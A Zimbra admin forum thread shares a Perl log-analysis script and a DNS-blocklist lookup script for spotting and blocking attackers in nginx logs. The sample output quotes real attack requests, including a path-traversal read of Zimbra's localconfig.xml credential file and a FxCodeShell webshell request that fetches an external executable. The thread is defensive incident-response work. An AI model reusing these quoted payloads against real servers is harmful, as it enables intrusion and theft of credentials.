Script to investigate nginx.access.log and attackers

Discuss your pilot or production implementation with other Zimbra admins or our engineers.
User avatar
JDunphy
Outstanding Member
Outstanding Member
Posts: 484
Joined: Fri Sep 12, 2014 11:18 pm
Location: Victoria, BC
ZCS/ZD Version: 8.7.11_P14 RHEL6 Network Edition
Contact:

Script to investigate nginx.access.log and attackers

Postby JDunphy » Tue Apr 30, 2019 11:57 pm

I would like to share a tool I have been using to investigate attacks against our zimbra servers with recent RCE/SSRF's. Without arguments it will look at all your /opt/zimbra/nginix.access.logs* and display what it thinks is attacks on your server. To get the most out of it, you should look for the section in STEP 1 in the code. By default, with no arguments it attempts to identify your zimbra users stream and everything else would be 'attackers' to it. Adding 1 or 2 specific things could allow you to isolate your normal zimbra users from everything else. It has built-in help. For those with TL;DR, try these commands:

Code: Select all

% check_attacks.pl --srcip '188.191.164.43|47.244.18.107|85.27.246.48|47.75.249.121|95.179.215.180|18.18.248.17|112.118.155.15|47.75.173.76|159.69.81.117|212.51.217.211|112.118.155.15'
% check_attacks.pl --pstatus=400
% check_attacks.pl | grep -A2 -i autodiscover
% check_attacks.pl --search autodiscover

It's a small perl program and can be found here: https://github.com/JimDunphy/ZimbraScripts/blob/master/src/check_attacks.pl

Code: Select all

% wget https://raw.githubusercontent.com/JimDunphy/ZimbraScripts/master/src/check_attacks.pl
% chmod 755 check_attacks.pl
% ./check_attacks.pl

For others, an explanation of some of the ways I have been using this.

Code: Select all

% check_attacks.pl -h

usage: % check_attacker.pl
        [--fcolor=<color name (i.e. RED)>]
        [--srcip=<ip address>]
        [--localUser ]
        [--IPlist ]
   [--statuscnt]
   [--display="date|upstream|bytes|port|referrer]
   [--usertype=<attacker|local|all>
   [--pstatus=<regex of status codes>
        [--help]
        [--version]
    where:
        --srcip|sr: print only records matching ip addresses
   --statuscnt: prints out the count for each status return code found
        --help|h: this message
examples:  (-- or - or first few characters of option so not ambigous)
         % check_attacker.pl -srcip 10.10.10.1      #only this ip address
         % check_attacker.pl -srcip  '10.10.10.1|20.20.20.2'      #only these ip addresses
         % check_attacker.pl -statuscnt  #print status codes
         % check_attacker.pl --statuscnt  #print status codes  #same
         % check_attacker.pl --localUser #include local users accounts
         % check_attacker.pl --IPlist   # print list of ips
         % check_attacker.pl --IPlist --ipset  # print list of ips in ipset format
         % check_attacker.pl --IPlist -pstatus='40.' --ipset  # print list of ips in ipset format with status code 400..409
         % check_attacker.pl --localUser --IPlist   # print list of local ips used by local users
         % check_attacker.pl --IPlist --ipset  | sh # install ip's into ipset
         % check_attacker.pl --initIPset  # show how to create ipset
         % check_attacker.pl -fc RED  #change color
         % check_attacker.pl --usertype=local  # print out strings of only local users
         % check_attacker.pl --pstatus='4..'  # print out only those requests with a code of 4XX (ie 403, 404, 499)
         % check_attacker.pl --usertype=all --pstatus='403|500'  # print out only those requests with a code of 403 or 500 for all types (local & attacker)
         % check_attacker.pl --display=date      # default is to display the user agent
         % check_attacker.pl --display=referrer  # default is to display the user agent

To give some examples (type enough characters so the program knows the option... ie) --sta works for --statuscnt... following along:

Code: Select all

% check_attacker.pl --status
Codes 200 Total: 67
Codes 302 Total: 1
Codes 400 Total: 58
Codes 404 Total: 23
Codes 501 Total: 1

Status code 400 are hard errors... let's investigate:

Code: Select all

% check_attacker.pl --pstatus='400'
   [ 400] |\x005\x00|\x00z\x00W\x00\xB0\x00|\x00|\x00\xEB\x00\xEA\x005\x00\xB0\x00\xE9\x00\xEB\x00V\x00W\x00V\x00!\x00\x06\x00Y\x00V\x00Y\x00\xB0\x00\xE9\x00\xE9\x00\x06\x00Y\x00W\x00\xEA\x00Y\x00|\x00\xE9\x00(\x005\x00\xA5\x00W\x00V\x00\xEB\x00\xEB\x005\x00!\x00{\x00{\x00{\x005\x00\xEA\x00\xA5\x00|\x00!\x00!\x00\xA5\x00V\x00W\x005\x00\xCC\x00(\x00W\x00\x06\x00\xEB\x00(\x00{\x00Y\x005\x00\x06\x00\xEA\x00(\x00\xCC\x00\xA5\x00\xA5\x00\xB0\x00{\x00\xB0\x00\xE9\x00\xE9\x00\xA5\x00\xE9\x00\xE9\x00!\x00\xA5\x00\xCC\x00Y\x00\xA5\x00\xB0\x00Y\x00(\x00\xEA\x00{\x00\x06\x00\xA5\x00\xA5\x00\x06\x00\xB0\x00{\x00W\x00\xEA\x00\x06\x00Y\x00z\x00\xEA\x00W\x00Y\x00\xEB\x00{\x00\xCC\x00|\x00\xB0\x00\xE9\x00|\x00(\x00(\x00\xEA\x00V\x00\xB0\x00!\x00\xB0\x00\x06\x00\xB0\x00z\x00\xA5\x00!\x00W\x00\xEA\x00V\x00z\x00\xEA\x00z\x00\x06\x00\xCC\x00\xCC\x00|\x005\x00(\x00\x06\x00z\x00{\x00|\x00z\x005\x00\xEB\x00|\x00!\x00\xE9\x005\x00{\x00|\x00V\x00z\x00\xCC\x00{\x00(\x00\xEB\x00Y\x00\xE9\x00z\x00|\x00!\x00\xCC\x00V\x00\xB0\x00V\x00\x06\x00\xEA\x00z\x00\xE9\x00{\x00\xEB\x00!\x00\xEA\x00\xEB\x00\x06\x00\xEA\x00|\x00Y\x00|\x005\x00z\x00Y\x00Y\x00V\x00V\x005\x00!\x00z\x00W\x00\xCC\x00W\x00!\x00|\x00V\x00\xCC\x00\xEA\x00\xB0\x00\x06\x00{\x00\xEA\x00\xCC\x005\x00\xCC\x00(\x00{\x00z\x00V\x00\x06\x00\xE9\x00\xEA\x00\xEA\x00\xEA\x00!\x00|\x00\x06\x00W\x00(\x00\xA5\x00z\x00\x06\x00W\x00V\x00\xEA\x00\x06\x00\xEB\x00!\x00\xA5\x00Y\x005\x00{\x00!\x00V\x00\xE9\x00\xCC\x005\x00\xEB\x00z\x00\xB0\x00\xEB\x00\x06\x00V\x00\xB0\x00\xA5\x00!\x00(\x00Y\x00(\x00(\x00V\x00z\x00\xB0\x00\xEB\x00\xEB\x00\xCC\x00!\x00\xCC\x00\xCC\x00\xCC\x00\xE9\x00(\x00|\x005\x00\xEB\x00\xEA\x005\x00\xEB\x00\xE9\x00\xA5\x00(\x00W\x00Y\x00Y\x00\xCC\x00|\x00Y\x00W\x00|\x00|\x00\xEB\x005\x00Y\x00\xE9\x00\xEA\x00\xA5\x00\x06\x00Y\x00{\x00\xEA\x00\xA5\x00\xE9\x00\xB0\x00!\x00\xEB\x00W\x00\xA5\x00z\x00\xA5\x00\xEB\x00\xA5\x00!\x00z\x00\xCC\x00\xB0\x00\xEB\x00V\x00\xCC\x00\xEA\x00\xCC\x00{\x00V\x00!\x00\x06\x00Y\x00\xEA\x00\xB0\x00\xB0\x00V\x00\xE9\x00\xEB\x00\xEA\x00V\x005\x00\xB0\x00W\x00\xEA\x00Y\x00(\x00\xCC\x00z\x00!\x00z\x00\x06\x005\x00\x06\x00z\x00\x06\x00\xEB\x00\xCA\x00 bot
   [ 400] \x09\x00\xB0\x00\xF3\x00\xD9\x00\x8E\x00\x09\x00\xA7\x00\xEC\x00\x8B\x00\xD9\x00\xF3\x00\x8E\x00\xD9\x00\xB0\x00z\x00\xB0\x00\xC5\x00\xFC\x00\xA7\x00z\x00\x09\x00\x17\x00\xC5\x00\xEC\x00H\x00\xFE\x00\xFE\x00j\x00\xFE\x00\x8E\x00\xC5\x00\xC5\x00\xFE\x00z\x00\xEC\x00\xA7\x00z\x00\xC5\x00\xF3\x00H\x00\xD9\x00\xA7\x00\xEC\x00\xD9\x00\x8B\x00\xFE\x00H\x00z\x00\xFB\x00H\x00\xFB\x00\x17\x00\xB0\x00\xF3\x00\xFC\x00\xFC\x00\x09\x00j\x00\x17\x00\xFB\x00\xFC\x00\x8E\x00\xEC\x00\xFB\x00\xF3\x00\xB0\x00\x8E\x00\x17\x00\x17\x00\xFC\x00\xC5\x00H\x00\xA7\x00\xFE\x00\xC5\x00\xF3\x00\xC5\x00\xA7\x00\xB0\x00\xFC\x00\xD9\x00\xFC\x00\xB0\x00\xFE\x00H\x00j\x00\xC5\x00\x17\x00z\x00\x17\x00\xFC\x00\xA7\x00\xD9\x00\xF3\x00\xEC\x00\xFE\x00\xA7\x00\xA7\x00\xFB\x00\xB0\x00\x8E\x00\xC5\x00\xB0\x00H\x00\x17\x00\xC5\x00\x8B\x00j\x00\x8E\x00\xEC\x00\xF3\x00\xFE\x00\xD9\x00\xF3\x00\xA7\x00j\x00\xEC\x00\xA7\x00\xB0\x00\x17\x00\xFC\x00H\x00H\x00\x09\x00\x09\x00\x09\x00H\x00\x8E\x00\xCE\x00 bot
 Attacker from  108.178.16.154                  2 Requests - Score 100%
------------------------------------------------------------------------------------------------------------
   [ 400] POST /Autodiscover/Autodiscover.xml  python-requests/2.21.0
 Attacker from  112.118.155.15                  1 Requests - Score 100%
------------------------------------------------------------------------------------------------------------
   [ 400] HEAD /  bot
   [ 400] HEAD /  bot
 Attacker from  138.246.253.5                   3 Requests - Score 100%
------------------------------------------------------------------------------------------------------------
   [ 400] )S\xC3b=\xE0)\x1Bp\x91K\xED\x88\x8FY\xC2 bot
 Attacker from  155.94.222.12                   1 Requests - Score 100%
------------------------------------------------------------------------------------------------------------
   [ 400] POST /Autodiscover/Autodiscover.xml  Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_2) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1309.0 Safari/537.17
 Attacker from  159.69.81.117                   2 Requests - Score 100%
------------------------------------------------------------------------------------------------------------
   [ 400] GET /  Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
   [ 400] GET /  Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
 Attacker from  164.52.24.162                   2 Requests - Score 25%

Note the Score of 25%. Most times this might be considered a door knocker but here we have someone attempting to perform a bad request. If you want to replace the user agent with the time try this:

Code: Select all

% check_attacks.pl --pstatus='400' --srcip='164.52.24.162' --display=date
   [ 400] GET /  30/Apr/2019:13:28:02
   [ 400] GET /  24/Apr/2019:05:15:56
 Attacker from  164.52.24.162                   2 Requests - Score 25%
------------------------------------------------------------------------------------------------------------

If you are satisfied then you can do this to get a list of attacking ip's. ("using tail -5 to keep output short for this post")

Code: Select all

% check_attacks.pl --iplist | head -5
107.170.202.34
107.170.204.68
108.178.16.154
112.118.155.15
112.64.199.58

If you use ipsets, do this

Code: Select all

% check_attacks.pl --iplist --ipset | head -5
ipset add blacklist24hr 107.170.202.34 -exists
ipset add blacklist24hr 107.170.204.68 -exists
ipset add blacklist24hr 108.178.16.154 -exists
ipset add blacklist24hr 112.118.155.15 -exists
ipset add blacklist24hr 112.64.199.58 -exists

If you only want certain type of status codes to be listed try this:

Code: Select all

% check_attacks.pl --iplist --pstatus='400|501' |head -5
108.178.16.154
112.118.155.15
138.246.253.5
155.94.222.12
159.69.81.117
% check_attacks.pl --iplist --ipset --pstatus='400' |head -5
ipset add blacklist24hr 108.178.16.154 -exists
ipset add blacklist24hr 112.118.155.15 -exists
ipset add blacklist24hr 138.246.253.5 -exists
ipset add blacklist24hr 155.94.222.12 -exists
ipset add blacklist24hr 159.69.81.117 -exists

The default case is like this:

Code: Select all

% check_attackers.pl
   [ 200] GET /  bot
 Attacker from  178.73.215.171                  1 Requests - Score 100%
------------------------------------------------------------------------------------------------------------
   [ 400] POST /Autodiscover/Autodiscover.xml  python-requests/2.21.0
   [ 400] GET /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00  python-requests/2.21.0
 Attacker from  18.18.248.17                    2 Requests - Score 100%
------------------------------------------------------------------------------------------------------------
   [ 200] GET /  bot
 Attacker from  184.105.139.69                  1 Requests - Score 100%
------------------------------------------------------------------------------------------------------------
   [ 200] GET /  bot
 Attacker from  184.105.247.194                 1 Requests - Score 100%
------------------------------------------------------------------------------------------------------------
   [ 200] GET /  bot
   [ 200] GET /  bot
 Attacker from  184.105.247.196                 2 Requests - Score 100%
------------------------------------------------------------------------------------------------------------
   [ 200] GET /  Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36
   [ 400] stealth request - exploit attemped bot
   [ 400] stealth request - exploit attemped bot
   [ 400] stealth request - exploit attemped bot
   [ 400] stealth request - exploit attemped bot
   [ 200] GET /robots.txt  bot
   [ 404] GET /sitemap.xml  bot
   [ 404] GET /.well-known/security.txt  bot
   [ 400] stealth request - exploit attemped bot
 Attacker from  185.142.236.34                  9 Requests - Score 100%
------------------------------------------------------------------------------------------------------------
   [ 200] GET /  Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36
   [ 400] stealth request - exploit attemped bot
   [ 400] stealth request - exploit attemped bot
   [ 400] stealth request - exploit attemped bot
   [ 400] stealth request - exploit attemped bot
   [ 200] GET /robots.txt  bot
   [ 404] GET /sitemap.xml  bot
   [ 404] GET /.well-known/security.txt  bot
   [ 400] stealth request - exploit attemped bot
 Attacker from  185.142.236.35                  9 Requests - Score 100%
...
...

Now the oddities... It tries to understand what your zimbra user stream is. That is the STEP1 section you probably need to customize to get the best behavior. That also means that if you have a 501 status code and investigate it with the print status command --pstatus='501', it might not display anything if it considered that record to be a zimbra or "local user". Meaning you might need to specify that you also want the "local" users requests. This is the purpose of the --usertype option and it can be attacker, local, or all. The default --usertype is attacker so you don't need to specify that for most investigations.

It has been enlightening to learn how zimbra is behaving from nginx's eyes. If you are having problems with customizing STEP 1', it isn't necessary to have the full logs for me... use the program to generate a few lines. I would like to incorporate those additions to the code so future users may not have to perform any customization and the program completely understands zimbra user session streams.

Code: Select all

% check_attacks.pl --srcip=X.X.X.X | head -50

In my experience, just 1 or perhaps 2 tweaks will let the script understand your zimbra traffic so none of it shows up in the default attacker display. I have only run this on 8.7.11+ but it should parse nginx.access.logs for newer versions of Zimbra.

Enjoy.

Jim
Last edited by JDunphy on Fri May 03, 2019 3:49 pm, edited 3 times in total.


User avatar
JDunphy
Outstanding Member
Outstanding Member
Posts: 484
Joined: Fri Sep 12, 2014 11:18 pm
Location: Victoria, BC
ZCS/ZD Version: 8.7.11_P14 RHEL6 Network Edition
Contact:

Re: Script to investigate nginx.access.log and attackers

Postby JDunphy » Wed May 01, 2019 5:55 pm

I am investigating various reputation lists to further my understanding of current attacks on our zimbra mailboxd services... Eventually, all this will be part of a feedback loop with modsecurity 3 and used in the scoring and identification of the type of bot with check_attacks.pl. Quick and dirty bash script included below to experiment with various reputation services. This scoring might be used in the future to help determine if counter measures like a capcha is displayed or even tarpitting for https access and hopefully reduce the more common bot attack exposure, etc. Still very fluid of what the end goal might be ... I am not a fan of long lived blacklists but the current attacks appear to be initiated from the same set of ip's at least on our servers. If anyone knows any good realtime databases of IP addresses participating in active attacks, please let me know. Thanks.

Code: Select all

% cat blcheck
#!/bin/bash

# usage: blcheck 1.1.1.2
#        check_attacker.pl --pstatus=400 --iplist | blcheck
#        cat list-of-ips | blcheck

BLISTS="
    cbl.abuseat.org
    dnsbl.sorbs.net
    bl.spamcop.net
    zen.spamhaus.org
"

# register at http://www.projecthoneypot.org/httpbl_api.php
# to obtain an API-key (free)
#add this to the BLISTS -  dnsbl.httpbl.org
#HTTPbl_API_KEY="your_api_key"

function lookupIP {

ip=$1

if [ -z "${ip}" ];then return;fi

#assumes proper ip address
reverse=$(echo $ip | awk -F\. '{printf "%s.%s.%s.%s",$4,$3,$2,$1}')

# -- cycle through all the blacklists
for BL in ${BLISTS}
do
    # dig to lookup the name in the blacklist
    printf "%-50s" " ${reverse}.${BL}."
    if [ "$BL" == "dnsbl.httpbl.org" ];
    then
      HIT="$(dig +short -t a ${HTTPbl_API_KEY}.${reverse}.${BL}.)"
      echo ${HIT:----}
    else
      #echo dig +short -t a ${reverse}.${BL}.
      HIT="$(dig +short -t a ${reverse}.${BL}.)"
      echo ${HIT:----}
    fi
done
}

# From the comand line or from stdin
{
    [ "$#" -gt 0 ] && printf '%s\n' "$@"
    [ ! -t 0 ]     && cat
} |
while IFS= read -r; do
    lookupIP "$REPLY"
done

exit;

Then usage is:

Code: Select all

% blcheck 164.52.24.162
 162.24.52.164.dnsbl.httpbl.org.                  ---
 162.24.52.164.cbl.abuseat.org.                   127.0.0.2
 162.24.52.164.dnsbl.sorbs.net.                   ---
 162.24.52.164.bl.spamcop.net.                    ---
 162.24.52.164.zen.spamhaus.org.                  127.0.0.4
 

or directly from zimbra nginx.access.logs*

Code: Select all

% ./check_attacks.pl --pstatus=400 --iplist | head -2 | blcheck
 5.253.246.138.dnsbl.httpbl.org.                  ---
 5.253.246.138.cbl.abuseat.org.                   127.0.0.2
 5.253.246.138.dnsbl.sorbs.net.                   ---
 5.253.246.138.bl.spamcop.net.                    ---
 5.253.246.138.zen.spamhaus.org.                  127.0.0.11 127.0.0.4
 162.24.52.164.dnsbl.httpbl.org.                  ---
 162.24.52.164.cbl.abuseat.org.                   127.0.0.2
 162.24.52.164.dnsbl.sorbs.net.                   ---
 162.24.52.164.bl.spamcop.net.                    ---
 162.24.52.164.zen.spamhaus.org.                  127.0.0.4
User avatar
JDunphy
Outstanding Member
Outstanding Member
Posts: 484
Joined: Fri Sep 12, 2014 11:18 pm
Location: Victoria, BC
ZCS/ZD Version: 8.7.11_P14 RHEL6 Network Edition
Contact:

Re: Script to investigate nginx.access.log and attackers

Postby JDunphy » Thu May 02, 2019 8:46 pm

Added a search and worked on more rules for scoring. The search works across the ip space and if any match is found will display that ip and all the requests it has made to your server. This is intentional as we already have stdout and grep... check_attacks.pl |grep something so was looking for what has this ip done to the server. --search '\.jsp|\.php|python|01/May' and it will search user agent, request, date and then format the requests by that ip.
Here is an example.

Code: Select all

% check_attacks.pl --search '\.jsp|autodis' | head -10
   [ 400] PUT /FxCodeShell.jsp%20  Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
   [ 400] PUT /FxCodeShell.jsp::$DATA  Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
   [ 400] PUT /FxCodeShell.jsp/  Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
   [ 400] GET /FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe  Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
 Attacker from  111.62.18.16                    4 Requests - Score 100%
------------------------------------------------------------------------------------------------------------
   [ 400] POST /Autodiscover/Autodiscover.xml  python-requests/2.21.0
 Attacker from  112.118.155.15                  1 Requests - Score 100%
------------------------------------------------------------------------------------------------------------
   [ 200] GET /  python-requests/2.21.0
relay3:~:50> check_attacks.pl --search '\.jsp|autodis' | head -15
   [ 400] PUT /FxCodeShell.jsp%20  Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
   [ 400] PUT /FxCodeShell.jsp::$DATA  Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
   [ 400] PUT /FxCodeShell.jsp/  Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
   [ 400] GET /FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe  Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
 Attacker from  111.62.18.16                    4 Requests - Score 100%
------------------------------------------------------------------------------------------------------------
   [ 400] POST /Autodiscover/Autodiscover.xml  python-requests/2.21.0
 Attacker from  112.118.155.15                  1 Requests - Score 100%
------------------------------------------------------------------------------------------------------------
   [ 200] GET /  python-requests/2.21.0
   [ 400] POST /Autodiscover/Autodiscover.xml  Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_2) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1309.0 Safari/537.17
 Attacker from  159.69.81.117                   2 Requests - Score 100%
------------------------------------------------------------------------------------------------------------
   [ 404] GET /nx8j78af1b.jsp  Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
 Attacker from  169.197.108.30                  1 Requests - Score 100%
 

If you want to see the date when this happened. Notice: the jsp request from 169.197.108.30, just add the --display=date and it will swap that in place of the user agent field.

Code: Select all

% check_attacks.pl --search '\.jsp|autodis' --display=date | head -15
   [ 400] PUT /FxCodeShell.jsp%20  26/Apr/2019:06:04:07
   [ 400] PUT /FxCodeShell.jsp::$DATA  26/Apr/2019:06:04:08
   [ 400] PUT /FxCodeShell.jsp/  26/Apr/2019:06:04:08
   [ 400] GET /FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe  26/Apr/2019:06:04:09
 Attacker from  111.62.18.16                    4 Requests - Score 100%
------------------------------------------------------------------------------------------------------------
   [ 400] POST /Autodiscover/Autodiscover.xml  29/Apr/2019:00:24:56
 Attacker from  112.118.155.15                  1 Requests - Score 100%
------------------------------------------------------------------------------------------------------------
   [ 200] GET /  28/Apr/2019:02:00:09
   [ 400] POST /Autodiscover/Autodiscover.xml  28/Apr/2019:02:00:09
 Attacker from  159.69.81.117                   2 Requests - Score 100%
------------------------------------------------------------------------------------------------------------
   [ 404] GET /nx8j78af1b.jsp  02/May/2019:06:20:50
 Attacker from  169.197.108.30                  1 Requests - Score 100%

Somethings are just beginning to hit me... You want to know to know if something larger than a /32 is hitting you... Use the --srcip with only 3 octets

Code: Select all

% check_attacks.pl --srcip 93.119.227
   [ 200] GET /  Wget/1.13.4 (linux-gnu)
 Attacker from  93.119.227.19                   1 Requests - Score 100%
------------------------------------------------------------------------------------------------------------
   [ 200] GET /  Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1
 Attacker from  93.119.227.34                   1 Requests - Score 25%
------------------------------------------------------------------------------------------------------------
   [ 200] GET /  Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:58.0) Gecko/20100101 Firefox/58.0
 Attacker from  93.119.227.91                   1 Requests - Score 25%
------------------------------------------------------------------------------------------------------------

Which shows some door knocking but nothing dangerous. Add the --display=date to track the frequency of the connection. Just a bot determining this is a zimbra site.
User avatar
Peter Parker
Posts: 7
Joined: Mon Apr 09, 2018 2:06 am
Location: Vietnam

Re: Script to investigate nginx.access.log and attackers

Postby Peter Parker » Wed Oct 16, 2019 8:15 am

Hi JDunphy,

Thank you very much for sharing with us this script. I'm facing this problem.

Return to “Administrators”

Who is online

Users browsing this forum: No registered users and 8 guests